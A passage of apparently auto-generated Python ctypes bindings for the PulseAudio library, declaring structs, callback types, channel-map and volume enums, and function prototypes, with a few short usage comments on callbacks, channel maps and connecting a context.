
class struct_pa_time_event(Structure):
    __slots__ = [
    ]
struct_pa_time_event._fields_ = [
    ('_opaque_struct', c_int)
]
pa_time_event = struct_pa_time_event # /usr/include/pulse/mainloop-api.h:66
pa_time_event_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_time_event), POINTER(struct_timeval), POINTER(None)) # /usr/include/pulse/mainloop-api.h:68
pa_time_event_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_time_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:70
class struct_pa_defer_event(Structure):
    __slots__ = [
    ]
struct_pa_defer_event._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_defer_event(Structure):
    __slots__ = [
    ]
struct_pa_defer_event._fields_ = [
    ('_opaque_struct', c_int)
]
pa_defer_event = struct_pa_defer_event # /usr/include/pulse/mainloop-api.h:73
pa_defer_event_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_defer_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:75
pa_defer_event_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_defer_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:77
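# Editor's sketch (not part of the generated wrapper): Python callables must
# be wrapped in the CFUNCTYPE objects above before being handed to
# PulseAudio, and the wrapper object must stay referenced for as long as the
# callback can fire, or ctypes will free the trampoline:
#
#     def _on_defer(api_p, event_p, userdata):
#         print('defer event fired')
#     _defer_cb = pa_defer_event_cb_t(_on_defer)  # keep this reference alive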
# /usr/include/pulse/mainloop-api.h:120
pa_mainloop_api_once = _lib.pa_mainloop_api_once
pa_mainloop_api_once.restype = None
pa_mainloop_api_once.argtypes = [POINTER(pa_mainloop_api), CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(None)), POINTER(None)]
enum_pa_channel_position = c_int
PA_CHANNEL_POSITION_INVALID = -1
PA_CHANNEL_POSITION_MONO = 0
PA_CHANNEL_POSITION_FRONT_LEFT = 1
PA_CHANNEL_POSITION_FRONT_RIGHT = 2
PA_CHANNEL_POSITION_FRONT_CENTER = 3
PA_CHANNEL_POSITION_LEFT = 0
PA_CHANNEL_POSITION_RIGHT = 0
PA_CHANNEL_POSITION_CENTER = 0
PA_CHANNEL_POSITION_REAR_CENTER = 1
PA_CHANNEL_POSITION_REAR_LEFT = 2
PA_CHANNEL_POSITION_REAR_RIGHT = 3
PA_CHANNEL_POSITION_LFE = 4
PA_CHANNEL_POSITION_SUBWOOFER = 0
PA_CHANNEL_POSITION_FRONT_LEFT_OF_CENTER = 1
PA_CHANNEL_POSITION_FRONT_RIGHT_OF_CENTER = 2
PA_CHANNEL_POSITION_SIDE_LEFT = 3
PA_CHANNEL_POSITION_SIDE_RIGHT = 4
PA_CHANNEL_POSITION_AUX0 = 5
PA_CHANNEL_POSITION_AUX1 = 6
PA_CHANNEL_POSITION_AUX2 = 7
PA_CHANNEL_POSITION_AUX3 = 8
PA_CHANNEL_POSITION_AUX4 = 9
PA_CHANNEL_POSITION_AUX5 = 10
PA_CHANNEL_POSITION_AUX6 = 11
PA_CHANNEL_POSITION_AUX7 = 12
PA_CHANNEL_POSITION_AUX8 = 13
PA_CHANNEL_POSITION_AUX9 = 14
PA_CHANNEL_POSITION_AUX10 = 15
PA_CHANNEL_POSITION_AUX11 = 16
PA_CHANNEL_POSITION_AUX12 = 17
PA_CHANNEL_POSITION_AUX13 = 18
PA_CHANNEL_POSITION_AUX14 = 19
PA_CHANNEL_POSITION_AUX15 = 20
PA_CHANNEL_POSITION_AUX16 = 21
PA_CHANNEL_POSITION_AUX17 = 22
PA_CHANNEL_POSITION_AUX18 = 23
PA_CHANNEL_POSITION_AUX19 = 24
PA_CHANNEL_POSITION_AUX20 = 25
PA_CHANNEL_POSITION_AUX21 = 26
PA_CHANNEL_POSITION_AUX22 = 27
PA_CHANNEL_POSITION_AUX23 = 28
PA_CHANNEL_POSITION_AUX24 = 29
PA_CHANNEL_POSITION_AUX25 = 30
PA_CHANNEL_POSITION_AUX26 = 31
PA_CHANNEL_POSITION_AUX27 = 32
PA_CHANNEL_POSITION_AUX28 = 33
PA_CHANNEL_POSITION_AUX29 = 34
PA_CHANNEL_POSITION_AUX30 = 35
PA_CHANNEL_POSITION_AUX31 = 36
PA_CHANNEL_POSITION_TOP_CENTER = 37
PA_CHANNEL_POSITION_TOP_FRONT_LEFT = 38
PA_CHANNEL_POSITION_TOP_FRONT_RIGHT = 39
PA_CHANNEL_POSITION_TOP_FRONT_CENTER = 40
PA_CHANNEL_POSITION_TOP_REAR_LEFT = 41
PA_CHANNEL_POSITION_TOP_REAR_RIGHT = 42
PA_CHANNEL_POSITION_TOP_REAR_CENTER = 43
PA_CHANNEL_POSITION_MAX = 44
pa_channel_position_t = enum_pa_channel_position # /usr/include/pulse/channelmap.h:147
pa_channel_position_mask_t = c_uint64 # /usr/include/pulse/channelmap.h:210
enum_pa_channel_map_def = c_int
PA_CHANNEL_MAP_AIFF = 0
PA_CHANNEL_MAP_ALSA = 1
PA_CHANNEL_MAP_AUX = 2
PA_CHANNEL_MAP_WAVEEX = 3
PA_CHANNEL_MAP_OSS = 4
PA_CHANNEL_MAP_DEF_MAX = 5
PA_CHANNEL_MAP_DEFAULT = 0
pa_channel_map_def_t = enum_pa_channel_map_def # /usr/include/pulse/channelmap.h:247
class struct_pa_channel_map(Structure):
    __slots__ = [
        'channels',
        'map',
    ]

struct_pa_channel_map._fields_ = [
    ('channels', c_uint8),
    ('map', pa_channel_position_t * 32),
]
pa_channel_map = struct_pa_channel_map # /usr/include/pulse/channelmap.h:268
# /usr/include/pulse/channelmap.h:273
pa_channel_map_init = _lib.pa_channel_map_init
pa_channel_map_init.restype = POINTER(pa_channel_map)
pa_channel_map_init.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:276
pa_channel_map_init_mono = _lib.pa_channel_map_init_mono
pa_channel_map_init_mono.restype = POINTER(pa_channel_map)
pa_channel_map_init_mono.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:279
pa_channel_map_init_stereo = _lib.pa_channel_map_init_stereo
pa_channel_map_init_stereo.restype = POINTER(pa_channel_map)
pa_channel_map_init_stereo.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:285
pa_channel_map_init_auto = _lib.pa_channel_map_init_auto
pa_channel_map_init_auto.restype = POINTER(pa_channel_map)
pa_channel_map_init_auto.argtypes = [POINTER(pa_channel_map), c_uint, pa_channel_map_def_t]
# /usr/include/pulse/channelmap.h:291
pa_channel_map_init_extend = _lib.pa_channel_map_init_extend
pa_channel_map_init_extend.restype = POINTER(pa_channel_map)
pa_channel_map_init_extend.argtypes = [POINTER(pa_channel_map), c_uint, pa_channel_map_def_t]
# /usr/include/pulse/channelmap.h:294
pa_channel_position_to_string = _lib.pa_channel_position_to_string
pa_channel_position_to_string.restype = c_char_p
pa_channel_position_to_string.argtypes = [pa_channel_position_t]
# /usr/include/pulse/channelmap.h:297
pa_channel_position_from_string = _lib.pa_channel_position_from_string
pa_channel_position_from_string.restype = pa_channel_position_t
pa_channel_position_from_string.argtypes = [c_char_p]
# /usr/include/pulse/channelmap.h:300
pa_channel_position_to_pretty_string = _lib.pa_channel_position_to_pretty_string
pa_channel_position_to_pretty_string.restype = c_char_p
pa_channel_position_to_pretty_string.argtypes = [pa_channel_position_t]
PA_CHANNEL_MAP_SNPRINT_MAX = 336 # /usr/include/pulse/channelmap.h:307
# /usr/include/pulse/channelmap.h:310
pa_channel_map_snprint = _lib.pa_channel_map_snprint
pa_channel_map_snprint.restype = c_char_p
pa_channel_map_snprint.argtypes = [c_char_p, c_size_t, POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:316
pa_channel_map_parse = _lib.pa_channel_map_parse
pa_channel_map_parse.restype = POINTER(pa_channel_map)
pa_channel_map_parse.argtypes = [POINTER(pa_channel_map), c_char_p]
# /usr/include/pulse/channelmap.h:319
pa_channel_map_equal = _lib.pa_channel_map_equal
pa_channel_map_equal.restype = c_int
pa_channel_map_equal.argtypes = [POINTER(pa_channel_map), POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:322
pa_channel_map_valid = _lib.pa_channel_map_valid
pa_channel_map_valid.restype = c_int
pa_channel_map_valid.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:326
pa_channel_map_compatible = _lib.pa_channel_map_compatible
pa_channel_map_compatible.restype = c_int
pa_channel_map_compatible.argtypes = [POINTER(pa_channel_map), POINTER(pa_sample_spec)]
# /usr/include/pulse/channelmap.h:329
pa_channel_map_superset = _lib.pa_channel_map_superset
pa_channel_map_superset.restype = c_int
pa_channel_map_superset.argtypes = [POINTER(pa_channel_map), POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:334
pa_channel_map_can_balance = _lib.pa_channel_map_can_balance
pa_channel_map_can_balance.restype = c_int
pa_channel_map_can_balance.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:339
pa_channel_map_can_fade = _lib.pa_channel_map_can_fade
pa_channel_map_can_fade.restype = c_int
pa_channel_map_can_fade.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:345
pa_channel_map_to_name = _lib.pa_channel_map_to_name
pa_channel_map_to_name.restype = c_char_p
pa_channel_map_to_name.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:350
pa_channel_map_to_pretty_name = _lib.pa_channel_map_to_pretty_name
pa_channel_map_to_pretty_name.restype = c_char_p
pa_channel_map_to_pretty_name.argtypes = [POINTER(pa_channel_map)]
# /usr/include/pulse/channelmap.h:354
pa_channel_map_has_position = _lib.pa_channel_map_has_position
pa_channel_map_has_position.restype = c_int
pa_channel_map_has_position.argtypes = [POINTER(pa_channel_map), pa_channel_position_t]
# /usr/include/pulse/channelmap.h:357
pa_channel_map_mask = _lib.pa_channel_map_mask
pa_channel_map_mask.restype = pa_channel_position_mask_t
pa_channel_map_mask.argtypes = [POINTER(pa_channel_map)]
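# Editor's sketch (not part of the generated wrapper): initializing a stereo
# channel map with the helpers above:
#
#     cmap = pa_channel_map()
#     pa_channel_map_init_stereo(byref(cmap))
#     pa_channel_map_valid(byref(cmap))  # nonzero on success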
class struct_pa_operation(Structure):
    __slots__ = [
    ]
struct_pa_operation._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_operation(Structure):
    __slots__ = [
    ]
struct_pa_operation._fields_ = [
    ('_opaque_struct', c_int)
]
pa_operation = struct_pa_operation # /usr/include/pulse/operation.h:33
pa_operation_notify_cb_t = CFUNCTYPE(None, POINTER(pa_operation), POINTER(None)) # /usr/include/pulse/operation.h:36
# /usr/include/pulse/operation.h:39
pa_operation_ref = _lib.pa_operation_ref
pa_operation_ref.restype = POINTER(pa_operation)
pa_operation_ref.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:42
pa_operation_unref = _lib.pa_operation_unref
pa_operation_unref.restype = None
pa_operation_unref.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:49
pa_operation_cancel = _lib.pa_operation_cancel
pa_operation_cancel.restype = None
pa_operation_cancel.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:52
pa_operation_get_state = _lib.pa_operation_get_state
pa_operation_get_state.restype = pa_operation_state_t
pa_operation_get_state.argtypes = [POINTER(pa_operation)]
# /usr/include/pulse/operation.h:60
pa_operation_set_state_callback = _lib.pa_operation_set_state_callback
pa_operation_set_state_callback.restype = None
pa_operation_set_state_callback.argtypes = [POINTER(pa_operation), pa_operation_notify_cb_t, POINTER(None)]
class struct_pa_context(Structure):
    __slots__ = [
    ]
struct_pa_context._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_context(Structure):
    __slots__ = [
    ]
struct_pa_context._fields_ = [
    ('_opaque_struct', c_int)
]
pa_context = struct_pa_context # /usr/include/pulse/context.h:154
pa_context_notify_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(None)) # /usr/include/pulse/context.h:157
pa_context_success_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_int, POINTER(None)) # /usr/include/pulse/context.h:160
class struct_pa_proplist(Structure):
    __slots__ = [
    ]
struct_pa_proplist._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_proplist(Structure):
    __slots__ = [
    ]
struct_pa_proplist._fields_ = [
    ('_opaque_struct', c_int)
]
pa_proplist = struct_pa_proplist # /usr/include/pulse/proplist.h:272
pa_context_event_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_char_p, POINTER(pa_proplist), POINTER(None)) # /usr/include/pulse/context.h:167
# /usr/include/pulse/context.h:172
pa_context_new = _lib.pa_context_new
pa_context_new.restype = POINTER(pa_context)
pa_context_new.argtypes = [POINTER(pa_mainloop_api), c_char_p]
# /usr/include/pulse/context.h:177
pa_context_new_with_proplist = _lib.pa_context_new_with_proplist
pa_context_new_with_proplist.restype = POINTER(pa_context)
pa_context_new_with_proplist.argtypes = [POINTER(pa_mainloop_api), c_char_p, POINTER(pa_proplist)]
# /usr/include/pulse/context.h:180
pa_context_unref = _lib.pa_context_unref
pa_context_unref.restype = None
pa_context_unref.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:183
pa_context_ref = _lib.pa_context_ref
pa_context_ref.restype = POINTER(pa_context)
pa_context_ref.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:186
pa_context_set_state_callback = _lib.pa_context_set_state_callback
pa_context_set_state_callback.restype = None
pa_context_set_state_callback.argtypes = [POINTER(pa_context), pa_context_notify_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:190
pa_context_set_event_callback = _lib.pa_context_set_event_callback
pa_context_set_event_callback.restype = None
pa_context_set_event_callback.argtypes = [POINTER(pa_context), pa_context_event_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:193
pa_context_errno = _lib.pa_context_errno
pa_context_errno.restype = c_int
pa_context_errno.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:196
pa_context_is_pending = _lib.pa_context_is_pending
pa_context_is_pending.restype = c_int
pa_context_is_pending.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:199
pa_context_get_state = _lib.pa_context_get_state
pa_context_get_state.restype = pa_context_state_t
pa_context_get_state.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:209
pa_context_connect = _lib.pa_context_connect
pa_context_connect.restype = c_int
pa_context_connect.argtypes = [POINTER(pa_context), c_char_p, pa_context_flags_t, POINTER(pa_spawn_api)]
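# Editor's sketch (not part of the generated wrapper): the usual connection
# sequence with the bindings above, assuming a pa_mainloop_api pointer `api`
# was obtained from a mainloop object elsewhere:
#
#     ctx = pa_context_new(api, b'my-app')
#     pa_context_connect(ctx, None, 0, None)  # default server, no flags
#     # ...then iterate the mainloop until pa_context_get_state(ctx) returns
#     # PA_CONTEXT_READY (or PA_CONTEXT_FAILED / PA_CONTEXT_TERMINATED).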
# /usr/include/pulse/context.h:212
pa_context_disconnect = _lib.pa_context_disconnect
pa_context_disconnect.restype = None
pa_context_disconnect.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:215
pa_context_drain = _lib.pa_context_drain
pa_context_drain.restype = POINTER(pa_operation)
pa_context_drain.argtypes = [POINTER(pa_context), pa_context_notify_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:220
pa_context_exit_daemon = _lib.pa_context_exit_daemon
pa_context_exit_daemon.restype = POINTER(pa_operation)
pa_context_exit_daemon.argtypes = [POINTER(pa_context), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:223
pa_context_set_default_sink = _lib.pa_context_set_default_sink
pa_context_set_default_sink.restype = POINTER(pa_operation)
pa_context_set_default_sink.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:226
pa_context_set_default_source = _lib.pa_context_set_default_source
pa_context_set_default_source.restype = POINTER(pa_operation)
pa_context_set_default_source.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:229
pa_context_is_local = _lib.pa_context_is_local
pa_context_is_local.restype = c_int
pa_context_is_local.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:232
pa_context_set_name = _lib.pa_context_set_name
pa_context_set_name.restype = POINTER(pa_operation)
pa_context_set_name.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:235
pa_context_get_server = _lib.pa_context_get_server
pa_context_get_server.restype = c_char_p
pa_context_get_server.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:238
pa_context_get_protocol_version = _lib.pa_context_get_protocol_version
pa_context_get_protocol_version.restype = c_uint32
pa_context_get_protocol_version.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:241
pa_context_get_server_protocol_version = _lib.pa_context_get_server_protocol_version
pa_context_get_server_protocol_version.restype = c_uint32
pa_context_get_server_protocol_version.argtypes = [POINTER(pa_context)]
enum_pa_update_mode = c_int
PA_UPDATE_SET = 0
PA_UPDATE_MERGE = 1
PA_UPDATE_REPLACE = 2
pa_update_mode_t = enum_pa_update_mode # /usr/include/pulse/proplist.h:337
# /usr/include/pulse/context.h:248
pa_context_proplist_update = _lib.pa_context_proplist_update
pa_context_proplist_update.restype = POINTER(pa_operation)
pa_context_proplist_update.argtypes = [POINTER(pa_context), pa_update_mode_t, POINTER(pa_proplist), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:251
pa_context_proplist_remove = _lib.pa_context_proplist_remove
pa_context_proplist_remove.restype = POINTER(pa_operation)
pa_context_proplist_remove.argtypes = [POINTER(pa_context), POINTER(c_char_p), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:256
pa_context_get_index = _lib.pa_context_get_index
pa_context_get_index.restype = c_uint32
pa_context_get_index.argtypes = [POINTER(pa_context)]
# /usr/include/pulse/context.h:260
pa_context_rttime_new = _lib.pa_context_rttime_new
pa_context_rttime_new.restype = POINTER(pa_time_event)
pa_context_rttime_new.argtypes = [POINTER(pa_context), pa_usec_t, pa_time_event_cb_t, POINTER(None)]
# /usr/include/pulse/context.h:264
pa_context_rttime_restart = _lib.pa_context_rttime_restart
pa_context_rttime_restart.restype = None
pa_context_rttime_restart.argtypes = [POINTER(pa_context), POINTER(pa_time_event), pa_usec_t]
# /usr/include/pulse/context.h:279
pa_context_get_tile_size = _lib.pa_context_get_tile_size
pa_context_get_tile_size.restype = c_size_t
pa_context_get_tile_size.argtypes = [POINTER(pa_context), POINTER(pa_sample_spec)]
# /usr/include/pulse/context.h:287
#pa_context_load_cookie_from_file = _lib.pa_context_load_cookie_from_file
#pa_context_load_cookie_from_file.restype = c_int
#pa_context_load_cookie_from_file.argtypes = [POINTER(pa_context), c_char_p]
pa_volume_t = c_uint32 # /usr/include/pulse/volume.h:120
class struct_pa_cvolume(Structure):
    __slots__ = [
        'channels',
        'values',
    ]

struct_pa_cvolume._fields_ = [
    ('channels', c_uint8),
    ('values', pa_volume_t * 32),
]
pa_cvolume = struct_pa_cvolume # /usr/include/pulse/volume.h:151
# /usr/include/pulse/volume.h:154
pa_cvolume_equal = _lib.pa_cvolume_equal
pa_cvolume_equal.restype = c_int
pa_cvolume_equal.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:159
pa_cvolume_init = _lib.pa_cvolume_init
pa_cvolume_init.restype = POINTER(pa_cvolume)
pa_cvolume_init.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:168
pa_cvolume_set = _lib.pa_cvolume_set
pa_cvolume_set.restype = POINTER(pa_cvolume)
pa_cvolume_set.argtypes = [POINTER(pa_cvolume), c_uint, pa_volume_t]
PA_CVOLUME_SNPRINT_MAX = 320 # /usr/include/pulse/volume.h:175
# /usr/include/pulse/volume.h:178
pa_cvolume_snprint = _lib.pa_cvolume_snprint
pa_cvolume_snprint.restype = c_char_p
pa_cvolume_snprint.argtypes = [c_char_p, c_size_t, POINTER(pa_cvolume)]
PA_SW_CVOLUME_SNPRINT_DB_MAX = 448 # /usr/include/pulse/volume.h:185
# /usr/include/pulse/volume.h:188
pa_sw_cvolume_snprint_dB = _lib.pa_sw_cvolume_snprint_dB
pa_sw_cvolume_snprint_dB.restype = c_char_p
pa_sw_cvolume_snprint_dB.argtypes = [c_char_p, c_size_t, POINTER(pa_cvolume)]
PA_CVOLUME_SNPRINT_VERBOSE_MAX = 1984 # /usr/include/pulse/volume.h:194
# /usr/include/pulse/volume.h:200
#pa_cvolume_snprint_verbose = _lib.pa_cvolume_snprint_verbose
#pa_cvolume_snprint_verbose.restype = c_char_p
#pa_cvolume_snprint_verbose.argtypes = [c_char_p, c_size_t, POINTER(pa_cvolume), POINTER(pa_channel_map), c_int]
PA_VOLUME_SNPRINT_MAX = 10 # /usr/include/pulse/volume.h:207
# /usr/include/pulse/volume.h:210
pa_volume_snprint = _lib.pa_volume_snprint
pa_volume_snprint.restype = c_char_p
pa_volume_snprint.argtypes = [c_char_p, c_size_t, pa_volume_t]
PA_SW_VOLUME_SNPRINT_DB_MAX = 11 # /usr/include/pulse/volume.h:217
# /usr/include/pulse/volume.h:220
pa_sw_volume_snprint_dB = _lib.pa_sw_volume_snprint_dB
pa_sw_volume_snprint_dB.restype = c_char_p
pa_sw_volume_snprint_dB.argtypes = [c_char_p, c_size_t, pa_volume_t]
PA_VOLUME_SNPRINT_VERBOSE_MAX = 35 # /usr/include/pulse/volume.h:226
# /usr/include/pulse/volume.h:231
#pa_volume_snprint_verbose = _lib.pa_volume_snprint_verbose
#pa_volume_snprint_verbose.restype = c_char_p
#pa_volume_snprint_verbose.argtypes = [c_char_p, c_size_t, pa_volume_t, c_int]
# /usr/include/pulse/volume.h:234
pa_cvolume_avg = _lib.pa_cvolume_avg
pa_cvolume_avg.restype = pa_volume_t
pa_cvolume_avg.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:241
pa_cvolume_avg_mask = _lib.pa_cvolume_avg_mask
pa_cvolume_avg_mask.restype = pa_volume_t
pa_cvolume_avg_mask.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:244
pa_cvolume_max = _lib.pa_cvolume_max
pa_cvolume_max.restype = pa_volume_t
pa_cvolume_max.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:251
pa_cvolume_max_mask = _lib.pa_cvolume_max_mask
pa_cvolume_max_mask.restype = pa_volume_t
pa_cvolume_max_mask.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:254
pa_cvolume_min = _lib.pa_cvolume_min
pa_cvolume_min.restype = pa_volume_t
pa_cvolume_min.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:261
pa_cvolume_min_mask = _lib.pa_cvolume_min_mask
pa_cvolume_min_mask.restype = pa_volume_t
pa_cvolume_min_mask.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:264
pa_cvolume_valid = _lib.pa_cvolume_valid
pa_cvolume_valid.restype = c_int
pa_cvolume_valid.argtypes = [POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:267
pa_cvolume_channels_equal_to = _lib.pa_cvolume_channels_equal_to
pa_cvolume_channels_equal_to.restype = c_int
pa_cvolume_channels_equal_to.argtypes = [POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:278
pa_sw_volume_multiply = _lib.pa_sw_volume_multiply
pa_sw_volume_multiply.restype = pa_volume_t
pa_sw_volume_multiply.argtypes = [pa_volume_t, pa_volume_t]
# /usr/include/pulse/volume.h:283
pa_sw_cvolume_multiply = _lib.pa_sw_cvolume_multiply
pa_sw_cvolume_multiply.restype = POINTER(pa_cvolume)
pa_sw_cvolume_multiply.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:289
pa_sw_cvolume_multiply_scalar = _lib.pa_sw_cvolume_multiply_scalar
pa_sw_cvolume_multiply_scalar.restype = POINTER(pa_cvolume)
pa_sw_cvolume_multiply_scalar.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:295
pa_sw_volume_divide = _lib.pa_sw_volume_divide
pa_sw_volume_divide.restype = pa_volume_t
pa_sw_volume_divide.argtypes = [pa_volume_t, pa_volume_t]
# /usr/include/pulse/volume.h:300
pa_sw_cvolume_divide = _lib.pa_sw_cvolume_divide
pa_sw_cvolume_divide.restype = POINTER(pa_cvolume)
pa_sw_cvolume_divide.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:306
pa_sw_cvolume_divide_scalar = _lib.pa_sw_cvolume_divide_scalar
pa_sw_cvolume_divide_scalar.restype = POINTER(pa_cvolume)
pa_sw_cvolume_divide_scalar.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:309
pa_sw_volume_from_dB = _lib.pa_sw_volume_from_dB
pa_sw_volume_from_dB.restype = pa_volume_t
pa_sw_volume_from_dB.argtypes = [c_double]
# /usr/include/pulse/volume.h:312
pa_sw_volume_to_dB = _lib.pa_sw_volume_to_dB
pa_sw_volume_to_dB.restype = c_double
pa_sw_volume_to_dB.argtypes = [pa_volume_t]
# /usr/include/pulse/volume.h:316
pa_sw_volume_from_linear = _lib.pa_sw_volume_from_linear
pa_sw_volume_from_linear.restype = pa_volume_t
pa_sw_volume_from_linear.argtypes = [c_double]
# /usr/include/pulse/volume.h:319
pa_sw_volume_to_linear = _lib.pa_sw_volume_to_linear
pa_sw_volume_to_linear.restype = c_double
pa_sw_volume_to_linear.argtypes = [pa_volume_t]
# /usr/include/pulse/volume.h:329
pa_cvolume_remap = _lib.pa_cvolume_remap
pa_cvolume_remap.restype = POINTER(pa_cvolume)
pa_cvolume_remap.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:333
pa_cvolume_compatible = _lib.pa_cvolume_compatible
pa_cvolume_compatible.restype = c_int
pa_cvolume_compatible.argtypes = [POINTER(pa_cvolume), POINTER(pa_sample_spec)]
# /usr/include/pulse/volume.h:337
pa_cvolume_compatible_with_channel_map = _lib.pa_cvolume_compatible_with_channel_map
pa_cvolume_compatible_with_channel_map.restype = c_int
pa_cvolume_compatible_with_channel_map.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:344
pa_cvolume_get_balance = _lib.pa_cvolume_get_balance
pa_cvolume_get_balance.restype = c_float
pa_cvolume_get_balance.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:355
pa_cvolume_set_balance = _lib.pa_cvolume_set_balance
pa_cvolume_set_balance.restype = POINTER(pa_cvolume)
pa_cvolume_set_balance.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), c_float]
# /usr/include/pulse/volume.h:362
pa_cvolume_get_fade = _lib.pa_cvolume_get_fade
pa_cvolume_get_fade.restype = c_float
pa_cvolume_get_fade.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map)]
# /usr/include/pulse/volume.h:373
pa_cvolume_set_fade = _lib.pa_cvolume_set_fade
pa_cvolume_set_fade.restype = POINTER(pa_cvolume)
pa_cvolume_set_fade.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), c_float]
# /usr/include/pulse/volume.h:378
pa_cvolume_scale = _lib.pa_cvolume_scale
pa_cvolume_scale.restype = POINTER(pa_cvolume)
pa_cvolume_scale.argtypes = [POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:384
pa_cvolume_scale_mask = _lib.pa_cvolume_scale_mask
pa_cvolume_scale_mask.restype = POINTER(pa_cvolume)
pa_cvolume_scale_mask.argtypes = [POINTER(pa_cvolume), pa_volume_t, POINTER(pa_channel_map), pa_channel_position_mask_t]
# /usr/include/pulse/volume.h:391
pa_cvolume_set_position = _lib.pa_cvolume_set_position
pa_cvolume_set_position.restype = POINTER(pa_cvolume)
pa_cvolume_set_position.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_t, pa_volume_t]
# /usr/include/pulse/volume.h:397
pa_cvolume_get_position = _lib.pa_cvolume_get_position
pa_cvolume_get_position.restype = pa_volume_t
pa_cvolume_get_position.argtypes = [POINTER(pa_cvolume), POINTER(pa_channel_map), pa_channel_position_t]
# /usr/include/pulse/volume.h:402
pa_cvolume_merge = _lib.pa_cvolume_merge
pa_cvolume_merge.restype = POINTER(pa_cvolume)
pa_cvolume_merge.argtypes = [POINTER(pa_cvolume), POINTER(pa_cvolume), POINTER(pa_cvolume)]
# /usr/include/pulse/volume.h:406
pa_cvolume_inc_clamp = _lib.pa_cvolume_inc_clamp
pa_cvolume_inc_clamp.restype = POINTER(pa_cvolume)
pa_cvolume_inc_clamp.argtypes = [POINTER(pa_cvolume), pa_volume_t, pa_volume_t]
# /usr/include/pulse/volume.h:410
pa_cvolume_inc = _lib.pa_cvolume_inc
pa_cvolume_inc.restype = POINTER(pa_cvolume)
pa_cvolume_inc.argtypes = [POINTER(pa_cvolume), pa_volume_t]
# /usr/include/pulse/volume.h:414
pa_cvolume_dec = _lib.pa_cvolume_dec
pa_cvolume_dec.restype = POINTER(pa_cvolume)
